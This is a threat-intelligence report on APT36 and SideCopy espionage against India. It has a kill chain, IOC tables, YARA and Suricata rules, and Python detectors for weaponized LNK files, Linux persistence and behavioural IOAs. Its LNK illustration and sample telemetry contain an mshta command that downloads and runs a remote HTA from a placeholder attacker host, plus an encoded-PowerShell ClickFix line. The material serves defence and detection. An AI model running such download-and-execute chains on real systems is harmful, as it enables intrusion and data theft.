Insight · 27 Mar 2026 · 13 min read

APT36, SideCopy & The #Pakistan Ghost in the #Bharat Machine – A Deep-Dive, Strictly for Exploit-Enthusiasts – #DhananjayRokde #iManEdge

► THREAT INTELLIGENCE REPORT — TLP:AMBER — RESTRICTED DISTRIBUTION

CSOC ADVISORY // INDIA-PAKISTAN CYBER CONFLICT // MARCH 2026

APT36, SideCopy &
The Ghost in the Machine

A forensic dismantling of Pakistan-aligned state-sponsored espionage against Indian Critical Information Infrastructure — kill chains, full IOC tables, MITRE ATT&CK mapping, YARA/Suricata rules, and a brutal autopsy of why Indian CSOCs keep failing.

// Report Date: 22 March 2026
// Threat Groups: APT36 · SideCopy · Transparent Tribe
// Target: India (GOI · MOD · CII · STARTUP SUPPLY CHAIN)
// Confidence: HIGH


// Table of Contents

  1. Threat Actor Profile: Unmasking the Apparatus
  2. The Numbers: Operation Sindoor & Campaign Statistics
  3. Full Arsenal Breakdown: Every Weapon in the Toolkit
  4. Unified Kill Chain — Step-by-Step Technical Anatomy
  5. Honey Trap & Social Engineering: The Unpatchable Vector
  6. Technical Deep Dive: Limepad, DeskRAT & Geta RAT
  7. C2 Infrastructure Analysis & Network Fingerprinting
  8. IOC Tables: Hashes, Domains, IPs, YARA & Suricata Rules
  9. Indicators of Attack (IOA) — Behavioural Detection Logic
  10. CSOC Failure Analysis: Why Defenses Keep Collapsing
  11. Supply Chain Pivot: Startups as the New Attack Surface
  12. Strategic Defense Playbook: Zero Trust to Agentic AI

01 Threat Actor Profile: Unmasking the Apparatus

APT36 — also catalogued as Transparent Tribe, Mythic Leopard, ProjectM, COPPER FIELDSTONE, and Earth Karkaddan — is a Pakistan-aligned Advanced Persistent Threat group assessed with high confidence to be sponsored by Pakistan’s Inter-Services Intelligence (ISI). Active since at least 2013, it represents the most persistent state-aligned cyber-espionage threat operating against Indian sovereign interests.

SideCopy is a closely affiliated sub-cluster, active since 2019, assessed to operate as a subordinate division within the Transparent Tribe umbrella. Infrastructure reuse and shared code in stager payloads confirm the operational overlap.

// ANALYST NOTE — ATTRIBUTION CONFIDENCE

Attribution evidence includes: C2 infrastructure resolving to AS numbers linked to Pakistan mobile data operators (Asia/Karachi timezone), VHDX payload metadata containing Pakistan PM Youth Laptop Scheme device fingerprints, hardcoded hex-encoded string “india” (DUSSEN field in Limepad config) for targeting verification, and domain registration patterns using Pakistani registrars.

Threat Actor Comparison Matrix

Attribute | APT36 (Transparent Tribe) | SideCopy
Alias cluster | Mythic Leopard, ProjectM, COPPER FIELDSTONE, Earth Karkaddan | SubK, Operation C-Major affiliate
Active since | 2013 | 2019
Platform focus | Linux (BOSS OS), Android, Windows | Windows primary, expanding to Linux
Primary languages | Python, Golang, .NET, Rust | .NET, C++, PowerShell
Flagship malware | CrimsonRAT, DeskRAT, Limepad, ElizaRAT, CapraRAT | CurlBack RAT, Spark RAT, CetaRAT, AllaKore RAT, ActionRAT
Motivation | Long-term strategic intelligence gathering | Intelligence + credential collection for subsequent ops

02 The Numbers: Operation Sindoor & Campaign Statistics

  • 650+ DDoS / defacement events, May 7–10, 2025
  • 35 hacktivist groups coordinated, 7 of them newly emerged
  • 4,000+ incidents logged ahead of Independence Day, Aug 2025
  • 13+ years APT36 has been active against Indian targets
  • 20+ commands executable via CrimsonRAT on an infected host
  • 60MB+ VHDX containers, sized to fall outside the file-size limits of many email and AV scanning engines

Campaign Timeline: Key Escalation Points (2022–2026)

AUG 2022

Limepad v0.1 First Observed (Zscaler)

New Python/PyInstaller exfiltration tool deployed inside VHDX containers targeting Kavach MFA users. Config field DUSSEN contains hex-encoded “india” as targeting geocheck. SQLite-based file sync mechanism for continuous exfiltration.

DEC 2023 – 2025

Mass NIC Spoofing Campaign

APT36 spoofs @nic.in email infrastructure to deliver payloads to high-ranking bureaucrats. Campaign spans 18+ months targeting India’s National Informatics Centre identity. Payloads include updated CrimsonRAT variants and malicious PPAM/XLAM macro files.

APR 22, 2025

Pahalgam Attack — Weaponized Within 48 Hours

APT36 weaponizes the Pahalgam terror attack as phishing lure within 48 hours. PDFs distributed linking to spoofed J&K Police and Indian Air Force credential portals. CrimsonRAT delivered to defense and government personnel.

MAY 7, 2025

Operation Sindoor — Multi-Vector National Assault

APT36 + SideCopy + 35 hacktivist groups (Telegram-coordinated under #OpIndia) launch simultaneous espionage, DDoS, and defacement. Targets: MoD, NIC, GSTN, AIIMS, Jio, BSNL. 650+ DDoS/defacement events in 72 hours. Deceptive domains pahalgamattack[.]com and operationsindoor2025[.]in registered.

JUL–SEP 2025

DeskRAT / StealthServer — Linux Cross-Platform Campaign

Sekoia and QiAnXin XLab (both Oct 2025) document the new Golang-based DeskRAT targeting BOSS Linux (India’s government OS). Three StealthServer variants (V1–V3) evolve from raw TCP to WebSocket C2 within weeks. C2 at modgovindia[.]com / modgovindia[.]space:4000, served from “stealth DNS” with no public NS records.

JAN–FEB 2026

Geta RAT + Ares RAT Cross-Platform Campaign (Aryaka)

Simultaneous Windows (Geta RAT) and Linux (Ares RAT via Go stager) campaigns using identical decoy documents. Geta RAT adapts its persistence method based on installed security products — first documented AV-aware persistence selection in APT36’s toolkit.


03 Full Arsenal Breakdown: Every Weapon in the Toolkit

The APT36/SideCopy toolset has expanded dramatically from CrimsonRAT’s .NET roots into a multi-language, multi-platform ecosystem. The shift to Golang and Rust is deliberate: both produce statically linked binaries that are routinely shipped with symbols stripped (Go: -ldflags "-s -w"), bury a few kilobytes of implant logic inside megabytes of runtime and library code, and cross-compile Windows and Linux payloads from a single codebase. The result frustrates static analysis and makes hash- and string-based signatures short-lived.

// KEY INSIGHT — THE BOSS OS TARGETING

Bharat Operating System Solutions (BOSS Linux) is India’s sovereign government-issued Linux distribution. APT36’s DeskRAT, Poseidon, and Ares RAT Linux variants are explicitly engineered to target this platform — evidenced by ‘bossupdate’ naming conventions and the ‘start_collection’ command that recursively sweeps from root (/). If your ministry runs BOSS, assume you are a named target in their operational orders.

Tool | Group | Lang / Platform | Key Capabilities | Status
CrimsonRAT | APT36 | .NET / Win | Keylog, screenshot, dir enum, file steal, 20+ commands, HTTP/HTTPS C2 | Active
DeskRAT | APT36 | Golang / Linux (BOSS) | 4 simultaneous persistence vectors, WebSocket C2, file collection by extension from /, start_collection cmd | Active 2025–26
StealthServer | APT36 | Golang / Win + Linux | V1: anti-debug, TCP; V2: new anti-debug; V3: WebSocket. Unifies Win/Linux tactics | Active 2025
Limepad | APT36 | Python / Win | SQLite file-sync, India TZ geocheck (hex “india”), multi-C2 failover, VHDX delivery | Confirmed
CapraRAT | APT36 | Java / Android | SMS intercept, call record, location, camera/mic, WhatsApp exfil | Active
Geta RAT | APT36 / SideCopy | .NET / Win | AV detection → adaptive persistence, USB harvest, credential steal, clipboard replace | Active 2025–26
CurlBack RAT | SideCopy | C++ / Win | Uses legitimate curl library for HTTPS comms, Railways/MEA sector targeting | Confirmed 2024–25
Spark RAT | SideCopy | Golang / Cross-platform | Windows + Linux + macOS, WebSocket C2, full command execution | Confirmed 2024

04 Unified Kill Chain — Step-by-Step Technical Anatomy

PHASE 1 — RECONNAISSANCE

OSINT harvest · SOCMINT (LinkedIn / Facebook / WhatsApp) · Honey trap persona build · Kavach / NIC portal recon · India-timezone targeting verification

↓ PHASE 2 — WEAPONIZATION

LNK / HTA / ISO / VHDX crafting · CrimsonRAT .NET compile · Golang DeskRAT build · ClickFix PDF prep · APK trojanization (CapraRAT)

↓ PHASE 3 — DELIVERY

Spear-phish (NIC / MoD spoof) · Malvertising (Google Ads) · WhatsApp / Telegram RAT drop · ZIP / ISO / VHDX archives · .desktop Linux file · PPAM macro · WinRAR CVE-2023-38831

↓ PHASE 4 — EXPLOITATION & EXECUTION

mshta.exe HTA exec · CVE-2023-38831 WinRAR · ClickFix PowerShell drop · Base64+XOR in-memory decode · IsDebuggerPresent / IsWow64Process anti-analysis · ReadOnly/.NET deser bypass

↓ PHASE 5 — INSTALLATION & PERSISTENCE

Registry Run keys · Cron jobs / systemd (BOSS Linux) · Startup shortcut (Limepad.dll) · DeskRAT: 4 persistence vectors simultaneously · Scheduled tasks · Shell profile .bashrc injection

↓ PHASE 6 — C2 COMMUNICATION

Google Drive / Slack / Discord · WebSocket (DeskRAT / StealthServer) · Telegram Bot API · Stealth DNS (no public NS records) · Contabo / Hostinger infra · AS / Karachi TZ fingerprint

↓ PHASE 7 — LATERAL MOVEMENT & DISCOVERY

Geta RAT process enum · Credential harvest (browser / Kavach) · USB data harvest · Dir / file enumeration (T1083) · AV-aware persistence adaptation

↓ PHASE 8 — EXFILTRATION & IMPACT

Limepad SQLite file sync · Screenshot / keylog stream · DeskRAT start_collection cmd · India TZ check (hex “india”) · HTTP POST via Python-urllib · Exfil over the WebSocket C2 channel to modgovindia[.]space:4000

4.1 — The LNK Weapon: Anatomy of a 2MB Shortcut

One of the most technically elegant evasion techniques documented in December 2025 campaigns is the weaponized LNK file. Windows never displays the .lnk extension (the shortcut file type is registered with NeverShowExt), even when “Hide extensions for known file types” is switched off, so “Report.pdf.lnk” renders as “Report.pdf” with whatever icon the shortcut declares. Inside the LNK, the full decoy PDF is embedded as binary data: the shortcut’s command line extracts and opens the PDF while the malicious chain executes invisibly in the background. Size is the tell. A genuine shortcut is a few kilobytes; one that carries a document is a megabyte or more.

// 1. User receives: "Online JLPT Exam Dec 2025.zip"
// 2. Extracts to:   "Online JLPT Exam Dec 2025.pdf"  <- .lnk hidden by Windows
// 3. Opens file -> LNK executes:

cmd.exe /c mshta.exe https://attacker-c2domain/payload.hta

// 4. HTA performs multi-stage in-memory decode:
HTA -> Base64 decode -> XOR decrypt -> load ReadOnly (.NET deser bypass)
HTA -> Drop + exec WriteOnly.dll (359KB RAT - iinneldc.dll)
// 5. Decoy PDF opens in user's default viewer - suspicion neutralized
// 6. RAT establishes persistence in Windows Registry / Startup
// 7. C2 beacon sent via HTTPS to stealth-DNS server
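To turn the chain above into a mail-gateway or triage check, here is an added example (not code from the original report or from any vendor write-up): a minimal parser for the Shell Link binary format and the heuristics a practitioner would apply to a shortcut, namely file size, a document extension hiding in front of .lnk, a LOLBin or URL in the command line, and a PDF or PE stashed after the shortcut structure. The sample shortcut is constructed in memory; its command line and the attacker-c2domain placeholder are taken from the illustration above, not from a real sample.

```python
"""LNK triage: parse a Windows shortcut and apply the checks described above.

Added example, not code from the original report. Hand-rolled parser for the
Shell Link binary format (MS-SHLLINK): 76-byte header, optional
LinkTargetIDList and LinkInfo, then the StringData fields in fixed order.
The sample shortcut is constructed in memory; 'attacker-c2domain' is the
placeholder used in the chain above, not a real indicator.
"""
from __future__ import annotations

import re
import struct

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
# LinkFlags bits that govern what follows the header (MS-SHLLINK 2.1.1)
HAS_ID_LIST, HAS_LINK_INFO = 0x01, 0x02
HAS_NAME, HAS_RELPATH, HAS_WORKDIR, HAS_ARGS, HAS_ICON = 0x04, 0x08, 0x10, 0x20, 0x40
IS_UNICODE = 0x80
STRING_FIELDS = ((HAS_NAME, "name"), (HAS_RELPATH, "relative_path"), (HAS_WORKDIR, "working_dir"),
                 (HAS_ARGS, "arguments"), (HAS_ICON, "icon_location"))
LOLBIN_RE = re.compile(r"\b(mshta|powershell|cmd|wscript|cscript|rundll32|regsvr32)(\.exe)?\b", re.I)
DOC_MASQ_RE = re.compile(r"\.(pdf|docx?|xlsx?|pptx?|jpe?g|png)\.lnk$", re.I)


def parse_lnk(data: bytes) -> dict:
    """Return LinkFlags, the offset where StringData ends, and the string fields present."""
    if len(data) < 0x4C or struct.unpack_from("<I", data, 0)[0] != 0x4C or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 0x14)[0]
    pos = 0x4C
    if flags & HAS_ID_LIST:              # uint16 IDListSize, then the item ID list
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:            # uint32 LinkInfoSize, size includes itself
        pos += struct.unpack_from("<I", data, pos)[0]
    fields = {}
    for bit, name in STRING_FIELDS:
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, pos)[0]   # CountCharacters, not bytes
        pos += 2
        width = 2 if flags & IS_UNICODE else 1
        raw = data[pos:pos + count * width]
        fields[name] = raw.decode("utf-16-le" if width == 2 else "cp1252")
        pos += count * width
    return {"flags": flags, "string_data_end": pos, **fields}


def triage_lnk(filename: str, data: bytes, size_threshold: int = 100 * 1024) -> list[str]:
    """Return the reasons a gateway should quarantine this shortcut (empty list = nothing found)."""
    info = parse_lnk(data)
    reasons = []
    if len(data) > size_threshold:       # a real shortcut is a few KB; a decoy carrier is not
        reasons.append(f"oversized shortcut: {len(data)} bytes")
    if DOC_MASQ_RE.search(filename):     # 'x.pdf.lnk' displays as 'x.pdf' because .lnk is never shown
        reasons.append("document extension masquerading in front of .lnk")
    cmdline = f"{info.get('relative_path', '')} {info.get('arguments', '')}".strip()
    if LOLBIN_RE.search(cmdline):
        reasons.append("command line runs a LOLBin: " + cmdline)
    if re.search(r"https?://", cmdline, re.I):
        reasons.append("remote URL in shortcut command line")
    # Decoy document or second stage appended after the shortcut structure
    for magic, label in ((b"%PDF-", "embedded PDF"), (b"MZ\x90\x00", "embedded PE")):
        off = data.find(magic, info["string_data_end"])
        if off != -1:
            reasons.append(f"{label} at offset {off}")
    return reasons


def build_sample_lnk(relative_path: str, arguments: str, trailer: bytes = b"") -> bytes:
    """Constructed sample: header with two Unicode StringData fields, plus an appended trailer."""
    flags = HAS_RELPATH | HAS_ARGS | IS_UNICODE
    # FileAttributes, 3 FILETIMEs, FileSize, IconIndex, ShowCommand=SW_SHOWNORMAL, HotKey, reserved
    header = struct.pack("<I", 0x4C) + LNK_CLSID + struct.pack(
        "<IIQQQIIIHHII", flags, 0x20, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0)
    body = b"".join(struct.pack("<H", len(s)) + s.encode("utf-16-le") for s in (relative_path, arguments))
    return header + body + trailer


MALICIOUS = build_sample_lnk(r"..\..\..\Windows\System32\cmd.exe",
                             "/c mshta.exe https://attacker-c2domain/payload.hta",
                             trailer=b"%PDF-1.7\n" + b"\0" * 200_000)   # decoy + padding to ~200 KB
BENIGN = build_sample_lnk(r"..\Program Files\Notepad++\notepad++.exe", "")

if __name__ == "__main__":
    for name, blob in (("Online JLPT Exam Dec 2025.pdf.lnk", MALICIOUS), ("notes.lnk", BENIGN)):
        print(name, "->", triage_lnk(name, blob) or "clean")
```

The parser deliberately stops after StringData: everything past that offset is either ExtraData blocks or, in a weaponized shortcut, the payload, so searching from there for file magic avoids false hits on the header. In a gateway, run triage_lnk on every .lnk inside archives as well, since the campaign delivers the shortcut in a ZIP.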

4.2 — DeskRAT Persistence Matrix (4 Simultaneous Vectors)

Persistence Vector | Location | MITRE
Cron job | /var/spool/cron/crontabs/ | T1053.003
Systemd service | /etc/systemd/system/*.service | T1543.002
Shell profile injection | ~/.bashrc or ~/.bash_profile | T1546.004
Autostart directory | ~/.config/autostart/*.desktop | T1547.013
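An added example, not code from the original report or from any vendor write-up: a hunt script that reads the four locations in the matrix above from a filesystem root (root='/' on a live host, or a mounted forensic image), extracts the executable each entry launches, and flags any executable wired into two or more vectors, which is the behavioural indicator the report calls F05 in section 09. The sample tree and the bossupdate path in it are constructed for the demonstration; the formats parsed (user crontabs, systemd ExecStart=, XDG Exec=, shell rc files) are the standard ones.

```python
"""Correlate Linux persistence vectors (cron, systemd, shell rc, XDG autostart).

Added example, not code from the original report or a vendor write-up. It walks
a filesystem root (root='/' on a live host, or a mounted image), extracts the
executable each persistence entry launches, and reports executables that are
wired into several vectors at once. The sample tree is constructed in a temp
directory; the 'bossupdate' path is a placeholder, not a real indicator.
"""
from __future__ import annotations

import re
import tempfile
from pathlib import Path

# Executable = first absolute path in command position: line start, after
# ; && || | ( , or after nohup/setsid/exec. 'export PATH=/x' does not match.
_CMD_RE = re.compile(r"(?:^|[;&|(]\s*|\b(?:nohup|setsid|exec)\s+)(/[^\s;&|)\"']+)")


def _exec_paths(command: str) -> set[str]:
    return {m.group(1) for m in _CMD_RE.finditer(command.strip())}


def _lines(path: Path):
    """Non-empty, non-comment lines of a text file."""
    for line in path.read_text(errors="replace").splitlines():
        line = line.strip()
        if line and not line.startswith("#"):
            yield line


def _glob(directory: Path, pattern: str):
    return directory.glob(pattern) if directory.is_dir() else []


def scan_persistence(root: Path) -> dict[str, set[str]]:
    """Map executable path -> set of persistence vectors that launch it."""
    hits: dict[str, set[str]] = {}

    def add(vector: str, command: str) -> None:
        for exe in _exec_paths(command):
            hits.setdefault(exe, set()).add(vector)

    # T1053.003 user crontabs: '@reboot cmd' or five schedule fields then cmd
    for tab in _glob(root / "var/spool/cron/crontabs", "*"):
        for line in _lines(tab):
            add("cron", line.split(None, 1 if line.startswith("@") else 5)[-1])
    # T1543.002 systemd units
    for unit in _glob(root / "etc/systemd/system", "*.service"):
        for line in _lines(unit):
            if line.startswith(("ExecStart=", "ExecStartPre=")):
                add("systemd", line.split("=", 1)[1].lstrip("-@+!:"))
    for home in list(_glob(root / "home", "*")) + [root / "root"]:
        # T1546.004 shell profile injection
        for rc in (".bashrc", ".bash_profile", ".profile"):
            if (home / rc).is_file():
                for line in _lines(home / rc):
                    add("shell_profile", line)
        # T1547.013 XDG autostart entries
        for desktop in _glob(home / ".config/autostart", "*.desktop"):
            for line in _lines(desktop):
                if line.startswith("Exec="):
                    add("autostart", line[5:])
    return hits


def multi_vector(hits: dict[str, set[str]], minimum: int = 2) -> dict[str, set[str]]:
    """IOA F05: one executable installed through several persistence vectors."""
    return {exe: vectors for exe, vectors in hits.items() if len(vectors) >= minimum}


def build_sample_tree(root: Path) -> Path:
    """Constructed sample: one implant in all four vectors plus benign entries."""
    implant = "/home/analyst/.local/share/bossupdate"
    files = {
        "var/spool/cron/crontabs/analyst":
            f"@reboot {implant} --daemon\n0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf\n",
        "etc/systemd/system/bossupdate.service": f"[Service]\nExecStart={implant} --daemon\n",
        "etc/systemd/system/ssh.service": "[Service]\nExecStart=/usr/sbin/sshd -D\n",
        "home/analyst/.bashrc":
            f"export PATH=/usr/local/bin:$PATH\n(nohup {implant} --daemon >/dev/null 2>&1 &)\n",
        "home/analyst/.config/autostart/bossupdate.desktop": f"[Desktop Entry]\nExec={implant} --daemon\n",
        "home/analyst/.config/autostart/nm-applet.desktop": "[Desktop Entry]\nExec=/usr/bin/nm-applet\n",
    }
    for rel, text in files.items():
        (root / rel).parent.mkdir(parents=True, exist_ok=True)
        (root / rel).write_text(text)
    return root


def demo() -> tuple[dict[str, set[str]], dict[str, set[str]]]:
    """Build the sample tree in a temp dir and return (all hits, multi-vector hits)."""
    hits = scan_persistence(build_sample_tree(Path(tempfile.mkdtemp(prefix="persist-hunt-"))))
    return hits, multi_vector(hits)


if __name__ == "__main__":
    all_hits, flagged = demo()
    for exe, vectors in sorted(all_hits.items()):
        print(("!! " if exe in flagged else "   ") + exe, "<-", ", ".join(sorted(vectors)))
```

The correlation is the point, not any single location: sshd in a unit file or logrotate in a crontab is normal, but the same binary under a user's home appearing in cron, systemd, .bashrc and autostart at once has no legitimate explanation. On a BOSS host with only syslog forwarding, this is the kind of check that can run from cron itself and ship its output to the SIEM.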

08 IOC Tables: Hashes, Domains, IPs, YARA & Suricata Rules

// DISCLAIMER — OPERATIONAL SECURITY

IOCs have limited shelf life. Consume as hunting seeds and behavioral baselines, not static blocklists. Domains presented in defanged format — re-fang before operationalizing.

8.1 — File Hashes (SHA-256)

SHA-256 | Family | Source
f03ac870cb91c00b51ddf29b6028d9ddf42477970eafa7c556e3a3d74ada25c9 | CrimsonRAT | CYFIRMA Jun 2025
55b7e20e42b57a32db29ea3f65d0fd2b2858aaeb9307b0ebbcdad1b0fcfd8059 | CrimsonRAT | CYFIRMA Jun 2025
55972edf001fd5afb1045bd96da835841c39fec4e3d47643e6a5dd793c904332 | Limepad loader | CYFIRMA Jun 2025

8.2 — Malicious Domains (Defanged)

Domain | Role | Hosting
modgovindia[.]com | DeskRAT payload staging + C2 | Hostinger
modgovindia[.]space | DeskRAT C2 (:4000 WebSocket) | Hostinger
emailgovin[.]gov-in[.]mywire[.]org | CrimsonRAT C2 / credential harvest | Contabo
pahalgamattack[.]com | OpSindoor phishing / psyops | Various
gov-in[.]mywire[.]org | CapraRAT / APK distribution | Dynamic DNS

8.3 — YARA Detection Rules

// YARA Rule - Limepad Exfiltration Tool
rule APT36_Limepad_Exfil_Tool {
  meta:
    author      = "ThreatIntel - APT36 Tracker"
    description = "Detects Limepad exfiltration tool targeting Indian GOI"
    date        = "2025-06-01"
    mitre       = "T1041, T1082, T1547.009"

  strings:
    $s1 = "Limepad.db"        ascii wide
    $s2 = "696e646961"       ascii  /* hex("india") - DUSSEN geocheck */
    $s3 = "SYNC_RULES_CONFIG" ascii wide
    $s4 = "Python-urllib"     ascii wide
    $s5 = "Auth_Token"        ascii wide
    $s6 = "DUSSEN"            ascii wide
    $pyinst = "PyInstaller"     ascii wide

  condition:
    (uint16(0) == 0x5A4D or uint16(0) == 0x4B50) and
    (($s1 and $s2) or ($s3 and $s4) or (3 of ($s1,$s2,$s3,$s4,$s5,$s6)))
    and $pyinst
}

rule APT36_DeskRAT_Golang_Linux {
  meta:
    description = "DeskRAT Golang Linux backdoor targeting BOSS OS"
    reference   = "Sekoia Oct 2025, QiAnXin XLab Oct 2025"

  strings:
    $go_magic  = { 47 6F 20 62 75 69 6C 64 }  /* "Go build" */
    $ws_proto  = "websocket"          ascii nocase
    $cmd1      = "start_collection"   ascii
    $c2_domain = "modgovindia"        ascii nocase
    $boss_ref  = "bossupdate"         ascii nocase

  condition:
    uint32(0) == 0x464C457F and  /* ELF magic */
    $go_magic and ($cmd1) and ($c2_domain or $boss_ref)
}

8.4 — Suricata IDS/IPS Rules

# Suricata rules are single-line statements; the trailing backslashes are
# line continuations. Before deployment, move the sids into your local range
# (1000000-1999999) so they cannot collide with vendor rulesets.

# Limepad initial check-in (GET with custom headers)
alert http any any -> any any ( \
  msg:"APT36.Limepad Initial Checkin Request"; \
  flow:established,to_server; \
  http.method; content:"GET"; \
  http.header_names; content:"Username"; \
  http.header_names; content:"Auth_Token"; \
  http.user_agent; content:"Python-urllib"; fast_pattern; startswith; \
  classtype:trojan-activity; sid:9001; rev:1; \
)

# DeskRAT C2 - WebSocket upgrade on a non-standard port. Matches only a
# cleartext ws:// channel; if the operators move to wss://, the upgrade
# headers sit inside TLS and only the port and the SNI remain observable.
alert tcp any any -> any 4000 ( \
  msg:"APT36.DeskRAT C2 WebSocket Port 4000"; \
  flow:established,to_server; \
  content:"GET /"; depth:6; \
  content:"Upgrade: websocket"; nocase; \
  pcre:"/Host:\s*(modgovindia|gov-in\.mywire)/i"; \
  classtype:trojan-activity; sid:9010; rev:1; \
)

# Dynamic-DNS lure domains under mywire.org; gov-?in matches both the
# 'govin' and 'gov-in' hostname forms seen in the domain table above.
alert dns any any -> any any ( \
  msg:"APT36.Dynamic DNS Lure Domain Pattern (mywire.org)"; \
  dns.query; content:"mywire.org"; endswith; \
  pcre:"/gov-?in.*mywire\.org/i"; \
  classtype:bad-unknown; sid:9015; rev:1; \
)

09 Indicators of Attack (IOA) — Behavioural Detection Logic

IOCs die. IOAs survive. A file hash becomes stale the moment the attacker recompiles. Behavioural IOAs detect the technique, not the implementation. This is where durable detection lives.

# | IOA Behavioural Pattern | MITRE | Priority
F01 | mshta.exe spawning from a non-browser process | T1218.005 | CRITICAL
F02 | Python-urllib beacon from a non-developer host | T1041 | CRITICAL
F03 | LNK file >100KB in an email attachment | T1204.002 | CRITICAL
F04 | Golang ELF recursively scanning from / by extension | T1083 | CRITICAL
F05 | 4 simultaneous persistence mechanisms created | T1053.003 + T1543.002 + T1546.004 | CRITICAL
F06 | Non-browser process calling Google Drive / Slack API from a server | T1102 | CRITICAL
F07 | Outbound TCP/WSS on port 4000 | T1095 | HIGH
F08 | User-executed clipboard paste → Run dialog → PowerShell -EncodedCommand | T1204.002 (ClickFix) | HIGH
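The table above as executable detection logic, as an added example rather than anything from the original report: each rule is a predicate over normalised endpoint events (process starts and network connections) and the sample events are constructed. The event field names and the host “role” tag are assumptions about your own telemetry pipeline, not a vendor schema; F03, F04 and F05 concern attachment contents and on-disk persistence rather than event streams and are omitted here.

```python
"""Behavioural IOAs from the table above as predicates over endpoint telemetry.

Added example, not code from the original report. Events are normalised dicts
(field names and the 'role' tag are assumptions about your own pipeline, not a
vendor schema). The sample events are constructed; hostnames and URLs in them
are placeholders or re-fanged indicators quoted from the report.
"""
from __future__ import annotations

import re

BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "brave.exe"}
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
COLLAB_APIS = ("googleapis.com", "drive.google.com", "slack.com", "discord.com", "api.telegram.org")
URL_RE = re.compile(r"https?://", re.I)
ENCODED_RE = re.compile(r"\s-(e|en|enc|encodedcommand)\s", re.I)   # PowerShell accepts prefixes


def ioa_f01(ev: dict) -> bool:
    """mshta.exe pulling a remote HTA, or launched from a script host rather than the user/browser."""
    return (ev["type"] == "process" and ev["image"] == "mshta.exe"
            and bool(URL_RE.search(ev["cmdline"]) or ev["parent"] in SCRIPT_HOSTS))


def ioa_f02(ev: dict) -> bool:
    """Python-urllib beacon from a host that is not a developer workstation (Limepad check-in)."""
    return (ev["type"] == "netconn" and ev.get("user_agent", "").startswith("Python-urllib")
            and ev["role"] != "developer")


def ioa_f06(ev: dict) -> bool:
    """Server-side, non-browser process calling collaboration/cloud APIs used as C2."""
    return (ev["type"] == "netconn" and ev["role"] == "server"
            and ev["image"] not in BROWSERS and ev["dst_host"].endswith(COLLAB_APIS))


def ioa_f07(ev: dict) -> bool:
    """WebSocket upgrade to TCP/4000 (DeskRAT C2 pattern)."""
    return ev["type"] == "netconn" and ev["dst_port"] == 4000 and bool(ev.get("ws_upgrade"))


def ioa_f08(ev: dict) -> bool:
    """ClickFix: explorer.exe (Run dialog paste) spawning powershell with an encoded command."""
    return (ev["type"] == "process" and ev["image"] == "powershell.exe"
            and ev["parent"] == "explorer.exe" and bool(ENCODED_RE.search(ev["cmdline"])))


RULES = {
    "F01": (ioa_f01, "T1218.005", "CRITICAL"),
    "F02": (ioa_f02, "T1041", "CRITICAL"),
    "F06": (ioa_f06, "T1102", "CRITICAL"),
    "F07": (ioa_f07, "T1095", "HIGH"),
    "F08": (ioa_f08, "T1204.002", "HIGH"),
}


def evaluate(events: list[dict]) -> list[tuple[str, str, str, int]]:
    """Return (rule_id, technique, priority, event_id) for every rule each event trips."""
    return [(rid, technique, prio, ev["id"])
            for ev in events for rid, (fn, technique, prio) in RULES.items() if fn(ev)]


SAMPLE_EVENTS = [  # constructed telemetry, not from a real incident
    {"id": 1, "type": "process", "host": "mod-ws-041", "role": "workstation", "parent": "cmd.exe",
     "image": "mshta.exe", "cmdline": "mshta.exe https://attacker-c2domain/payload.hta"},
    {"id": 2, "type": "process", "host": "mod-ws-041", "role": "workstation", "parent": "explorer.exe",
     "image": "powershell.exe", "cmdline": "powershell -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBi"},
    {"id": 3, "type": "netconn", "host": "nic-app-07", "role": "server", "image": "python.exe",
     "dst_host": "sync.example.net", "dst_port": 443, "user_agent": "Python-urllib/3.11"},
    {"id": 4, "type": "netconn", "host": "nic-app-07", "role": "server", "image": "updater.exe",
     "dst_host": "www.googleapis.com", "dst_port": 443, "user_agent": ""},
    {"id": 5, "type": "netconn", "host": "boss-fs-02", "role": "server", "image": "bossupdate",
     "dst_host": "modgovindia.space", "dst_port": 4000, "ws_upgrade": True},
    {"id": 6, "type": "netconn", "host": "dev-lap-12", "role": "developer", "image": "python.exe",
     "dst_host": "pypi.org", "dst_port": 443, "user_agent": "Python-urllib/3.12"},
    {"id": 7, "type": "process", "host": "mod-ws-041", "role": "workstation", "parent": "explorer.exe",
     "image": "chrome.exe", "cmdline": "chrome.exe --profile-directory=Default"},
]

if __name__ == "__main__":
    for rid, technique, prio, eid in evaluate(SAMPLE_EVENTS):
        print(f"[{prio}] {rid} {technique} event={eid}")
```

Two design points carry over to a real SIEM: the host role is what keeps F02 and F06 from drowning in developer and browser noise, so asset tagging is a detection prerequisite, not housekeeping; and each predicate keys on parent, image and command line rather than a hash, so a recompiled mshta loader or a renamed Python beacon still trips it.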

10 CSOC Failure Analysis: Why Defenses Keep Collapsing

Compliance is the theater of security. APT36 does not present its credentials at the gate — it never uses the gate at all.
— SOC failure analysis framework

F01 Signature-Based Detection Ineffectiveness Against Golang/Rust Payloads

APT36’s DeskRAT, StealthServer, and Spark RAT are written in Golang. A Go binary statically links the runtime and standard library, so the implant’s own logic is a sliver inside a multi-megabyte executable, and two builds of the same source (different Go version, module set or stripped symbols) share few static features. A file hash, by definition, has a 0% hit rate against a binary nobody has seen before. Geta RAT goes further: it enumerates installed AV/EDR before selecting its persistence mechanism. It is designed to understand your detection stack.

F02 TLS Blindspot — C2 Traffic Over Encrypted Channels

When CrimsonRAT or ElizaRAT uses the Google Drive API for C2, traffic exits the network over TLS 1.3 to 142.250.x.x (Google IP space). Without TLS inspection (SSL MITM), the SOC sees only “encrypted traffic to Google.” Most Indian government network segments do not implement TLS inspection due to certificate management complexity. APT36 knows this. They bank on it. The metadata is not nothing, though: the process that opened the connection (EDR), the TLS SNI and JA3/JA4 fingerprint, and the simple fact that a server has no business calling the Drive API are all visible without decrypting a byte.

F03 Perimeter-Only Visibility — Zero Internal East-West Telemetry

